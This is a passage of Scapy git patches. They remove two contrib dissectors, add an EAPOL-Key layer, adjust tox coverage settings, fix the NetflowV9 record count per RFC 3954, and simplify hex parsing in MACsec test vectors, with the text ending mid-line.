--git a/scapy/contrib/ubberlogger.py b/scapy/contrib/ubberlogger.py deleted file mode 100644 index 3fd509ae748..00000000000 --- a/scapy/contrib/ubberlogger.py +++ /dev/null @@ -1,119 +0,0 @@ -# SPDX-License-Identifier: GPL-2.0-or-later -# This file is part of Scapy -# See https://scapy.net/ for more information - -# Author: Sylvain SARMEJEANNE - -# scapy.contrib.description = Ubberlogger dissectors -# scapy.contrib.status = loads - -from scapy.packet import Packet, bind_layers -from scapy.fields import ByteEnumField, ByteField, IntField, ShortField - -# Syscalls known by Uberlogger -uberlogger_sys_calls = {0: "READ_ID", - 1: "OPEN_ID", - 2: "WRITE_ID", - 3: "CHMOD_ID", - 4: "CHOWN_ID", - 5: "SETUID_ID", - 6: "CHROOT_ID", - 7: "CREATE_MODULE_ID", - 8: "INIT_MODULE_ID", - 9: "DELETE_MODULE_ID", - 10: "CAPSET_ID", - 11: "CAPGET_ID", - 12: "FORK_ID", - 13: "EXECVE_ID"} - -# First part of the header - - -class Uberlogger_honeypot_caract(Packet): - name = "Uberlogger honeypot_caract" - fields_desc = [ByteField("honeypot_id", 0), - ByteField("reserved", 0), - ByteField("os_type_and_version", 0)] - -# Second part of the header - - -class Uberlogger_uber_h(Packet): - name = "Uberlogger uber_h" - fields_desc = [ByteEnumField("syscall_type", 0, uberlogger_sys_calls), - IntField("time_sec", 0), - IntField("time_usec", 0), - IntField("pid", 0), - IntField("uid", 0), - IntField("euid", 0), - IntField("cap_effective", 0), - IntField("cap_inheritable", 0), - IntField("cap_permitted", 0), - IntField("res", 0), - IntField("length", 0)] - -# The 9 following classes are options depending on the syscall type - - -class Uberlogger_capget_data(Packet): - name = "Uberlogger capget_data" - fields_desc = [IntField("target_pid", 0)] - - -class Uberlogger_capset_data(Packet): - name = "Uberlogger capset_data" - fields_desc = [IntField("target_pid", 0), - IntField("effective_cap", 0), - IntField("permitted_cap", 0), - IntField("inheritable_cap", 0)] - - -class Uberlogger_chmod_data(Packet): - name = "Uberlogger chmod_data" - fields_desc = [ShortField("mode", 0)] - - -class Uberlogger_chown_data(Packet): - name = "Uberlogger chown_data" - fields_desc = [IntField("uid", 0), - IntField("gid", 0)] - - -class Uberlogger_open_data(Packet): - name = "Uberlogger open_data" - fields_desc = [IntField("flags", 0), - IntField("mode", 0)] - - -class Uberlogger_read_data(Packet): - name = "Uberlogger read_data" - fields_desc = [IntField("fd", 0), - IntField("count", 0)] - - -class Uberlogger_setuid_data(Packet): - name = "Uberlogger setuid_data" - fields_desc = [IntField("uid", 0)] - - -class Uberlogger_create_module_data(Packet): - name = "Uberlogger create_module_data" - fields_desc = [IntField("size", 0)] - - -class Uberlogger_execve_data(Packet): - name = "Uberlogger execve_data" - fields_desc = [IntField("nbarg", 0)] - - -# Layer bounds for Uberlogger -bind_layers(Uberlogger_honeypot_caract, Uberlogger_uber_h) -bind_layers(Uberlogger_uber_h, Uberlogger_capget_data) -bind_layers(Uberlogger_uber_h, Uberlogger_capset_data) -bind_layers(Uberlogger_uber_h, Uberlogger_chmod_data) -bind_layers(Uberlogger_uber_h, Uberlogger_chown_data) -bind_layers(Uberlogger_uber_h, Uberlogger_open_data) -bind_layers(Uberlogger_uber_h, Uberlogger_read_data) -bind_layers(Uberlogger_uber_h, Uberlogger_setuid_data) -bind_layers(Uberlogger_uber_h, Uberlogger_create_module_data) -bind_layers(Uberlogger_uber_h, Uberlogger_execve_data) diff --git a/scapy/contrib/wpa_eapol.py b/scapy/contrib/wpa_eapol.py deleted file mode 100644 index 77853d12c7e..00000000000 --- a/scapy/contrib/wpa_eapol.py +++ /dev/null @@ -1,41 +0,0 @@ -# SPDX-License-Identifier: GPL-2.0-or-later -# This file is part of Scapy -# See https://scapy.net/ for more information - -# scapy.contrib.description = WPA EAPOL-KEY -# scapy.contrib.status = loads - -from scapy.packet import Packet, bind_layers -from scapy.fields import ByteField, LenField, ShortField, StrFixedLenField, \ - StrLenField -from scapy.layers.eap import EAPOL - - -class WPA_key(Packet): - name = "WPA_key" - fields_desc = [ByteField("descriptor_type", 1), - ShortField("key_info", 0), - LenField("len", None, "H"), - StrFixedLenField("replay_counter", "", 8), - StrFixedLenField("nonce", "", 32), - StrFixedLenField("key_iv", "", 16), - StrFixedLenField("wpa_key_rsc", "", 8), - StrFixedLenField("wpa_key_id", "", 8), - StrFixedLenField("wpa_key_mic", "", 16), - LenField("wpa_key_length", None, "H"), - StrLenField("wpa_key", "", length_from=lambda pkt:pkt.wpa_key_length)] # noqa: E501 - - def extract_padding(self, s): - tmp_len = self.len - return s[:tmp_len], s[tmp_len:] - - def hashret(self): - return chr(self.type) + self.payload.hashret() - - def answers(self, other): - if isinstance(other, WPA_key): - return 1 - return 0 - - -bind_layers(EAPOL, WPA_key, type=3) diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index de3707e0591..64579888d1f 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -10,11 +10,35 @@ import struct -from scapy.fields import BitField, ByteField, XByteField,\ - ShortField, IntField, XIntField, ByteEnumField, StrLenField, XStrField,\ - XStrLenField, XStrFixedLenField, LenField, FieldLenField, FieldListField,\ - PacketField, PacketListField, ConditionalField, PadField -from scapy.packet import Packet, Padding, bind_layers +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + IntField, + LenField, + LongField, + PacketField, + PacketListField, + PadField, + ShortField, + StrLenField, + XByteField, + XIntField, + XStrField, + XStrFixedLenField, + XStrLenField, +) +from scapy.packet import ( + Packet, + Padding, + bind_bottom_up, + bind_layers, + bind_top_down, +) from scapy.layers.l2 import SourceMACField, Ether, CookedLinux, GRE, SNAP from scapy.config import conf from scapy.compat import orb, chb @@ -404,6 +428,64 @@ class LEAP(EAP): ] +############################################################################# +# IEEE 802.1X-2010 - EAPOL-Key +############################################################################# + +# sect 11.9 of 802.1X-2010 +# AND sect 12.7.2 of 802.11-2016 + + +class EAPOL_KEY(Packet): + name = "EAPOL_KEY" + fields_desc = [ + ByteEnumField("key_descriptor_type", 1, {1: "RC4", 2: "RSN"}), + # Key Information + BitEnumField("key_descriptor_type_version", 0, 3, { + 1: "HMAC-MD5+ARC4", + 2: "HMAC-SHA1-128+AES-128", + 3: "AES-128-CMAC+AES-128", + }), + BitEnumField("key_type", 0, 1, {0: "Group/SMK", 1: "Pairwise"}), + BitField("res", 0, 2), + BitField("install", 0, 1), + BitField("key_ack", 0, 1), + BitField("has_key_mic", 1, 1), + BitField("secure", 0, 1), + BitField("error", 0, 1), + BitField("request", 0, 1), + BitField("encrypted_key_data", 0, 1), + BitField("smk_message", 0, 1), + BitField("res2", 0, 2), + # + LenField("len", None, "H"), + LongField("key_replay_counter", 0), + XStrFixedLenField("key_nonce", "", 32), + XStrFixedLenField("key_iv", "", 16), + XStrFixedLenField("key_rsc", "", 8), + XStrFixedLenField("key_id", "", 8), + ConditionalField( + XStrFixedLenField("key_mic", "", 16), # XXX size can be 24 + lambda pkt: pkt.has_key_mic + ), + LenField("key_length", None, "H"), + XStrLenField("key", "", + length_from=lambda pkt: pkt.key_length) + ] + + def extract_padding(self, s): + return s[:self.len], s[self.len:] + + def hashret(self): + return struct.pack("!B", self.type) + self.payload.hashret() + + def answers(self, other): + if isinstance(other, EAPOL_KEY) and \ + other.descriptor_type == self.descriptor_type: + return 1 + return 0 + + ############################################################################# # IEEE 802.1X-2010 - MACsec Key Agreement (MKA) protocol ############################################################################# @@ -765,10 +847,14 @@ def extract_padding(self, s): return "", s -bind_layers(Ether, EAPOL, type=34958) -bind_layers(Ether, EAPOL, dst='01:80:c2:00:00:03', type=34958) -bind_layers(CookedLinux, EAPOL, proto=34958) -bind_layers(GRE, EAPOL, proto=34958) +# Bind EAPOL types bind_layers(EAPOL, EAP, type=0) -bind_layers(SNAP, EAPOL, code=34958) +bind_layers(EAPOL, EAPOL_KEY, type=3) bind_layers(EAPOL, MKAPDU, type=5) + +bind_bottom_up(Ether, EAPOL, type=0x888e) +# the reserved IEEE Std 802.1X PAE address +bind_top_down(Ether, EAPOL, dst='01:80:c2:00:00:03', type=0x888e) +bind_layers(CookedLinux, EAPOL, proto=0x888e) +bind_layers(SNAP, EAPOL, code=0x888e) +bind_layers(GRE, EAPOL, proto=0x888e) diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts index 69b5b1b81a0..51616281781 100644 --- a/test/scapy/layers/eap.uts +++ b/test/scapy/layers/eap.uts @@ -52,6 +52,21 @@ assert eapol.type == 0 assert eapol.len == 60 assert eapol.haslayer(EAP_FAST) +############ +############ ++ EAPOL-Key class tests + += EAPOK-Key - over 802.11 - Dissection +s = b'\x08\x02:\x01\x00\xc0\xcab\xa4\xf6\x00"k\xfbI+\x00"k\xfbI+\xa0[\xaa\xaa\x03\x00\x00\x00\x88\x8e\x02\x03\x00u\x02\x00\x8a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x95X{I5\':3\x8f\x90\xb1I\xae\x1f\xd7-"\x82\x1e\\$\xefC=\x83\x97?M\xd6\xdf>\x9b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\xdd\x14\x00\x0f\xac\x04\x03\xca?d\xca\xed\xdd\xef\xf69;\xefX\xd4\x97w' +wifi = Dot11(s) +assert wifi[EAPOL].key_descriptor_type == 2 +assert wifi[EAPOL].key_type == 0 +assert wifi[EAPOL].has_key_mic == 1 +assert wifi[EAPOL].encrypted_key_data == 1 +assert wifi[EAPOL].key_replay_counter == 4 +assert wifi[EAPOL].key_mic == b"\x00" * 16 +assert wifi[EAPOL].key_length == 22 +assert len(wifi[EAPOL].key) == 22 ############ ############ diff --git a/tox.ini b/tox.ini index cd85bd7c808..34aa2a6525e 100644 --- a/tox.ini +++ b/tox.ini @@ -39,13 +39,13 @@ platform = bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd windows: win32 commands = - linux_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} - linux_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} - bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} - bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} - windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} - coverage combine - coverage xml -i + linux_non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} + linux_root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} + bsd_non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} + bsd_root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} + windows: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} + {env:DISABLE_COVERAGE:coverage combine} + {env:DISABLE_COVERAGE:coverage xml -i} # Variants of the main tests From 64b8abaa1bd708d20d716216758f1d5ac082e165 Mon Sep 17 00:00:00 2001 From: Nicolas Bloyet Date: Tue, 21 Mar 2023 08:44:50 +0100 Subject: [PATCH 0990/1632] Fix #3897 - Incorrect behavior of NetflowHeaderV9 Count (#3898) * Add test case of complete build Complex packet with 5 flowsets of all available types Templates / Option-Templates / Data with several records inside each flowset. * Add test of dissection for complex Netflow packet Example taken is the one from the previous example * Typo * Fix Netflow Header Count Field According to RFC 3954 Count The total number of records in the Export Packet, which is the sum of : - Options FlowSet records, - Template FlowSet records, and - Data FlowSet records * conform to flake8 * Update scapy/layers/netflow.py Fix indentation Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> * Flake8 conformation --------- Co-authored-by: nibl --- scapy/layers/netflow.py | 21 +++- test/scapy/layers/netflow.uts | 176 ++++++++++++++++++++++++++++++++++ 2 files changed, 193 insertions(+), 4 deletions(-) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 77ffda21e77..0b79923d217 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -32,6 +32,7 @@ import socket import struct +from collections import Counter from scapy.config import conf from scapy.data import IP_PROTOS @@ -1259,11 +1260,23 @@ class NetflowHeaderV9(Packet): IntField("SourceID", 0)] def post_build(self, pkt, pay): + + def count_by_layer(layer): + if type(layer) == NetflowFlowsetV9: + return len(layer.templates) + elif type(layer) == NetflowDataflowsetV9: + return len(layer.records) + elif type(layer) == NetflowOptionsFlowsetV9: + return 1 + else: + return 0 + if self.count is None: - count = sum(1 for x in self.layers() if x in [ - NetflowFlowsetV9, - NetflowDataflowsetV9, - NetflowOptionsFlowsetV9] + # https://www.rfc-editor.org/rfc/rfc3954#section-5.1 + count = sum( + sum(count_by_layer(self.getlayer(layer_cls, nth)) + for nth in range(1, n + 1)) + for layer_cls, n in Counter(self.layers()).items() ) pkt = struct.pack("!H", count) + pkt[2:] return pkt + pay diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index d43735d6299..50c3c6823c4 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -173,6 +173,182 @@ option_templateFlowSet_256 = NetflowOptionsFlowsetV9( ]) assert raw(option_templateFlowSet_256) == b'\x00\x01\x00\x1c\x01\x00\x00\x04\x00\x0c\x00\x01\x00\x04\x00\n\x00\x04\x00R\x00 \x00S\x00\xf0\x00\x00' += NetflowV9 - Advanced build, multiple flowsets and multiple records by flowset +~ netflow + +template_flowset = NetflowFlowsetV9( + templates=[ NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType="IN_BYTES", fieldLength=1), + NetflowTemplateFieldV9(fieldType="IN_PKTS", fieldLength=4), + NetflowTemplateFieldV9(fieldType="PROTOCOL"), + NetflowTemplateFieldV9(fieldType="IPV4_SRC_ADDR"), + NetflowTemplateFieldV9(fieldType="IPV4_DST_ADDR"), + ], + templateID=256, + fieldCount=5), + NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType="IN_BYTES", fieldLength=1), + NetflowTemplateFieldV9(fieldType="IN_PKTS", fieldLength=4), + NetflowTemplateFieldV9(fieldType="PROTOCOL"), + NetflowTemplateFieldV9(fieldType="IPV6_SRC_ADDR"), + NetflowTemplateFieldV9(fieldType="IPV6_DST_ADDR"), + ], + templateID=257, + fieldCount=5) + ], + flowSetID=0 +) + +# Generate classes for data records +Record256 = GetNetflowRecordV9(template_flowset, templateID = 256) +Record257 = GetNetflowRecordV9(template_flowset, templateID = 257) + +# Now lets build a dataFlowSet with 5* #256 records +dataFlowset_1 = NetflowDataflowsetV9( + templateID=256, + records=[ + Record256( + IN_BYTES=b"\x12", + IN_PKTS=b"\0\0\0\0", + PROTOCOL=1, + IPV4_SRC_ADDR="192.168.0.10", + IPV4_DST_ADDR="192.168.0.11" + ), + Record256( + IN_BYTES=b"\x0c", + IN_PKTS=b"\1\1\1\1", + PROTOCOL=2, + IPV4_SRC_ADDR="172.0.0.10", + IPV4_DST_ADDR="172.0.0.11" + ), + Record256( + IN_BYTES=b"\x0c", + IN_PKTS=b"\1\1\1\1", + PROTOCOL=3, + IPV4_SRC_ADDR="172.0.0.10", + IPV4_DST_ADDR="172.0.0.11" + ), + Record256( + IN_BYTES=b"\x0c", + IN_PKTS=b"\1\1\1\1", + PROTOCOL=4, + IPV4_SRC_ADDR="172.0.0.10", + IPV4_DST_ADDR="172.0.0.11" + ), + Record256( + IN_BYTES=b"\x0c", + IN_PKTS=b"\1\1\1\1", + PROTOCOL=5, + IPV4_SRC_ADDR="172.0.0.10", + IPV4_DST_ADDR="172.0.0.11" + ) + ], +) + +dataFlowset_2 = NetflowDataflowsetV9( + templateID=257, + records=[ + Record257( + IN_BYTES=b"\x12", + IN_PKTS=b"\0\0\0\0", + PROTOCOL=1, + IPV6_SRC_ADDR="2001:db8:3333:4444:5555:6666:7777:8888", + IPV6_DST_ADDR="2001:db8::" + ), + Record257( + IN_BYTES=b"\x0c", + IN_PKTS=b"\1\1\1\1", + PROTOCOL=2, + IPV6_SRC_ADDR="2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF", + IPV6_DST_ADDR="2001:db8::" + ) + ], +) + +# An option template flowset, containing an unique template +opttmpl258_flowSet = NetflowOptionsFlowsetV9( + templateID = 258, + option_scope_length = 4*1, + option_field_length = 4*2, + scopes = [ + NetflowOptionsFlowsetScopeV9(scopeFieldType= 1, scopeFieldlength= 4), + ], + options = [ + NetflowOptionsFlowsetOptionV9(optionFieldType= 34, optionFieldlength= 4), + NetflowOptionsFlowsetOptionV9(optionFieldType= 35, optionFieldlength= 1) + ]) + +# And finally a Record class for #258 Options +class Record_258(NetflowRecordV9): + name = "Option interface-table" + fields_desc = [ + IntField("System", 0), + IntField("SAMPLING_INTERVAL", 4), + XByteField("SAMPLING_ALGORITHM", 1) + ] + match_subclass = True + + +# with a record Flowset +optiondataFlowset = NetflowDataflowsetV9( + templateID=258, + records=[ + Record_258( + System=424242, + SAMPLING_INTERVAL=100, + SAMPLING_ALGORITHM=0x01 + ), + Record_258( + System=242424, + SAMPLING_INTERVAL=1000, + SAMPLING_ALGORITHM=0x02 + ) + ], +) + +netflow_header = NetflowHeader()/NetflowHeaderV9(unixSecs=1547927349.328283) +pkt = netflow_header / template_flowset / opttmpl258_flowSet / dataFlowset_1 / dataFlowset_2 / optiondataFlowset +# Count: 12 = 2 + 1 + 5 + 2 + 2 + +assert raw(pkt) == b'\x00\t\x00\x0c\x00\x00\x00\x00\\C\x7f5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x01\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x1b\x00\x10\x00\x1c\x00\x10\x00\x01\x00\x18\x01\x02\x00\x04\x00\x08\x00\x01\x00\x04\x00"\x00\x04\x00#\x00\x01\x00\x00\x01\x00\x00L\x12\x00\x00\x00\x00\x01\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x0c\x01\x01\x01\x01\x02\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x03\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x04\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x05\xac\x00\x00\n\xac\x00\x00\x0b\x00\x00\x01\x01\x00P\x12\x00\x00\x00\x00\x01 \x01\r\xb833DDUUffww\x88\x88 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x01\x01\x01\x01\x02 \x01\r\xb833DD\xcc\xcc\xdd\xdd\xee\xee\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x18\x00\x06y2\x00\x00\x00d\x01\x00\x03\xb2\xf8\x00\x00\x03\xe8\x02\x00\x00' + + += NetflowV9 - Advanced dissection, complete example +~ netflow + +pkt = NetflowHeader(b'\x00\t\x00\x0c\x00\x00\x00\x00\\C\x7f5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x01\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x1b\x00\x10\x00\x1c\x00\x10\x00\x01\x00\x18\x01\x02\x00\x04\x00\x08\x00\x01\x00\x04\x00"\x00\x04\x00#\x00\x01\x00\x00\x01\x00\x00L\x12\x00\x00\x00\x00\x01\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x0c\x01\x01\x01\x01\x02\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x03\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x04\xac\x00\x00\n\xac\x00\x00\x0b\x0c\x01\x01\x01\x01\x05\xac\x00\x00\n\xac\x00\x00\x0b\x00\x00\x01\x01\x00P\x12\x00\x00\x00\x00\x01 \x01\r\xb833DDUUffww\x88\x88 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x01\x01\x01\x01\x02 \x01\r\xb833DD\xcc\xcc\xdd\xdd\xee\xee\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x18\x00\x06y2\x00\x00\x00d\x01\x00\x03\xb2\xf8\x00\x00\x03\xe8\x02\x00\x00') + +nf_header = pkt.getlayer(NetflowHeader) +assert nf_header.version == 9 +nfv9_header = pkt.getlayer(NetflowHeaderV9) +assert nf_header.count == 12 + +flowset_1 = pkt.getlayer(NetflowFlowsetV9, 1) +assert len(flowset_1.templates) == 2 +assert flowset_1.templates[0].templateID == 256 +assert flowset_1.templates[1].templateID == 257 +assert flowset_1.templates[1].fieldCount == 5 +assert flowset_1.templates[1].template_fields[1].fieldLength == 4 + +flowset_2 = pkt.getlayer(NetflowOptionsFlowsetV9, 1) +assert flowset_2.templateID == 258 +assert len(flowset_2.scopes) == 1 +assert len(flowset_2.options) == 2 +assert flowset_2.pad == b'\x00\x00' + +flowset_3 = pkt.getlayer(NetflowDataflowsetV9, 1) +assert flowset_3.templateID == 256 +assert flowset_3.length == 76 + +flowset_4 = pkt.getlayer(NetflowDataflowsetV9, 2) +assert flowset_4.templateID == 257 + +flowset_5 = pkt.getlayer(NetflowDataflowsetV9, 3) +assert flowset_5.templateID == 258 + + ############ ############ + Netflow v10 (aka IPFix) From 43582d36fe202916fab4f36f0fd10d697eabd8a5 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 21 Mar 2023 11:58:31 +0300 Subject: [PATCH 0991/1632] cleanup: replace bytes(bytearray.fromhex()) with bytes.fromhex() (#3946) Now that Python2 is no longer supported the intermediate bytearray.fromhex() step is redundant and can be removed. --- test/contrib/macsec.uts | 32 ++++++++++++++++---------------- test/scapy/layers/inet.uts | 2 +- 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/test/contrib/macsec.uts b/test/contrib/macsec.uts index 26caaaf2cc4..14b59cc0b49 100755 --- a/test/contrib/macsec.uts +++ b/test/contrib/macsec.uts @@ -274,100 +274,100 @@ except TypeError as e: = MACsec - Standard Test Vectors - C.1.1 GCM-AES-128 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB2C28465, key=b'\xAD\x7A\x2B\xD0\x3E\xAC\x83\x5A\x6F\x62\x0F\xDC\xB5\x06\xB3\x45', icvlen=16, encrypt=0, send_sci=1) -p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) +p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001")) m = sa.encap(p) iv = sa.make_iv(m) assert raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001F09478A9B09007D06F46E9B6A1DA25DD"))) +ref = Raw(bytes.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001F09478A9B09007D06F46E9B6A1DA25DD")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.2 GCM-AES-256 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB2C28465, key=b'\xE3\xC0\x8A\x8F\x06\xC6\xE3\xAD\x95\xA7\x05\x57\xB2\x3F\x75\x48\x3C\xE3\x30\x21\xA9\xC7\x2B\x70\x25\x66\x62\x04\xC6\x9C\x0B\x72', icvlen=16, encrypt=0, send_sci=1) -p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) +p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001")) m = sa.encap(p) iv = sa.make_iv(m) assert raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400012F0BC5AF409E06D609EA8B7D0FA5EA50"))) +ref = Raw(bytes.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400012F0BC5AF409E06D609EA8B7D0FA5EA50")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.3 GCM-AES-XPN-128 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB0DF459CB2C28465, key=b'\xAD\x7A\x2B\xD0\x3E\xAC\x83\x5A\x6F\x62\x0F\xDC\xB5\x06\xB3\x45', icvlen=16, encrypt=0, send_sci=1, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') -p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) +p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001")) m = sa.encap(p) iv = sa.make_iv(m) assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F3031323334000117FE1981EBDD4AFC5062697E8BAA0C23"))) +ref = Raw(bytes.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F3031323334000117FE1981EBDD4AFC5062697E8BAA0C23")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.4 GCM-AES-XPN-256 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB0DF459CB2C28465, key=b'\xE3\xC0\x8A\x8F\x06\xC6\xE3\xAD\x95\xA7\x05\x57\xB2\x3F\x75\x48\x3C\xE3\x30\x21\xA9\xC7\x2B\x70\x25\x66\x62\x04\xC6\x9C\x0B\x72', icvlen=16, encrypt=0, send_sci=1, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') -p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) +p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001")) m = sa.encap(p) iv = sa.make_iv(m) assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400014DBD2F6A754A6CF728CC129BA6931577"))) +ref = 